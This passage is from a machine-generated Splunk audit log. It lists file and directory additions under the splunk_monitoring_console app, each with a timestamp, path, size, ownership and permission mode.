uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.277, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components/ColorRangeFromLabelControl.js", isdir=0, size=805, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.274, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components/ColorRangeControlRow.js", isdir=0, size=3941, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.271, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components/ColorRangeControlMaster.js", isdir=0, size=13847, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.267, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components/ColorRangeControlGroup.js", isdir=0, size=1488, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.163, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.158, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/PageController.pcss", isdir=0, size=2475, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.154, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/PageController.js", isdir=0, size=1236, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.150, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/Master.js", isdir=0, size=2991, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.146, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/Master.html", isdir=0, size=676, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.142, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/GridRow.js", isdir=0, size=9313, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.137, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/GridRow.html", isdir=0, size=443, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.134, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/Grid.js", isdir=0, size=2526, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.124, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/Grid.html", isdir=0, size=598, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/EditThresholdConfigDialog.js", isdir=0, size=5241, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/PageController.js", isdir=0, size=2060, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.106, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/Master.js", isdir=0, size=3299, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.101, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/Master.html", isdir=0, size=654, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.096, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/GridRow.js", isdir=0, size=3623, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.091, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/GridRow.html", isdir=0, size=1234, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.087, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/Grid.js", isdir=0, size=2884, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.082, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise/Grid.html", isdir=0, size=732, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.976, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/shared/EnableAlertDialog.js", isdir=0, size=3584, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.972, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/shared/EditAlertDialog.js", isdir=0, size=12637, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.967, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/shared/DisableAlertDialog.js", isdir=0, size=2584, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.963, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/PageController.js", isdir=0, size=3562, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.959, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/Master.js", isdir=0, size=1552, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.954, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/Master.html", isdir=0, size=312, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.949, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/GridRow.js", isdir=0, size=3915, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.945, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/GridRow.html", isdir=0, size=821, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/Grid.js", isdir=0, size=2994, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.930, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/Grid.html", isdir=0, size=457, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.926, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/EnableAlertDialog.js", isdir=0, size=3037, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.922, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/EditAlertDialog.pcss", isdir=0, size=3199, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.918, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/EditAlertDialog.js", isdir=0, size=13979, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.915, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite/DisableAlertDialog.js", isdir=0, size=448, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.809, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/shared", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/lite", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.800, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/enterprise", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.796, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup/PageController.pcss", isdir=0, size=2637, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.691, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/enterprise/RebuildAssetsDialog.js", isdir=0, size=7148, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.687, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/enterprise/RebuildAssetsDialog.html", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.684, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/enterprise/Master.js", isdir=0, size=6499, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.679, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/enterprise/Master.html", isdir=0, size=2294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.674, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/enterprise/BuildAssetsNowDialog.js", isdir=0, size=4543, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.671, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/lite/dialogs/Master_old.js", isdir=0, size=7413, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.666, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/lite/dialogs/Master.js", isdir=0, size=7145, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.662, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/lite/dialogs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.658, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/lite/Master.js", isdir=0, size=9095, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.652, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/lite/Master.html", isdir=0, size=722, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.545, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/lite", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/enterprise", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.536, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup/Master.pcss", isdir=0, size=281, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.531, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.527, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/forwarder_setup", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.523, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/dmc_alerts_setup", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.519, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/controls/Multiselect.jsx", isdir=0, size=788, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.513, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/controls/BackboneProvider.jsx", isdir=0, size=948, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.509, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/PageController.pcss.js", isdir=0, size=38504, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.504, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/PageController.pcss", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.499, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/PageController.js", isdir=0, size=1961, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.494, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/NewButtons.js", isdir=0, size=1906, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.491, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/GridRow.js", isdir=0, size=3377, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.487, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/GridRow.html", isdir=0, size=1040, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.483, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/AddEditDialog.js", isdir=0, size=12372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list/ActionCell.js", isdir=0, size=1467, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.374, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/TopologyPanel.pcss", isdir=0, size=1254, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.370, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/TopologyPanel.jsx", isdir=0, size=29945, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.366, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/MetricsPanelModal.pcss", isdir=0, size=201, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.362, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/MetricsPanelModal.jsx", isdir=0, size=10691, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.359, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/MetricsPanel.pcss", isdir=0, size=728, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.355, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/MetricsPanel.jsx", isdir=0, size=8347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.352, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/ComponentsPanel.pcss", isdir=0, size=628, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels/ComponentsPanel.jsx", isdir=0, size=1147, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.243, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/bookmark/Utils.es", isdir=0, size=2056, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.240, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/bookmark/BookmarkModal.pcss", isdir=0, size=35, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.234, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/bookmark/BookmarkModal.jsx", isdir=0, size=8456, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.229, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/bookmark/Bookmark.pcss", isdir=0, size=987, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.225, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/bookmark/Bookmark.jsx", isdir=0, size=2096, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.219, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/deploymentPanels", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.213, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/bookmark", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.208, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/Landing.pcss", isdir=0, size=1104, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.202, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/Landing.jsx", isdir=0, size=8180, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.199, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/Anomalies.pcss", isdir=0, size=485, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.194, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing/Anomalies.jsx", isdir=0, size=7255, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.089, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/utils.js", isdir=0, size=562, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.086, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.077, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check_list", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.073, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.064, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.058, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/landing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.054, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.050, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/controls", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:58.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/Title.js", isdir=0, size=1317, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.042, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/ReactAdapterBase.es", isdir=0, size=1009, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/Master.pcss", isdir=0, size=4717, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/Master.js", isdir=0, size=36705, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.027, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/Download.pcss", isdir=0, size=65, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:58.022, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/Download.jsx", isdir=0, size=3546, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/volume_detail_deployment_extension.js", isdir=0, size=1233, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.912, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/splunk_tcpin_performance_instance_extension.js", isdir=0, size=2579, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/splunk_tcpin_performance_extension.js", isdir=0, size=2463, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/splunk_tcpin_performance_deployment_extension.js", isdir=0, size=1426, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.900, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/search_usage_statistics_extension.js", isdir=0, size=1253, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.896, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/search_activity_deployment_extension.js", isdir=0, size=2224, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.892, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/scheduler_activity_extension.js", 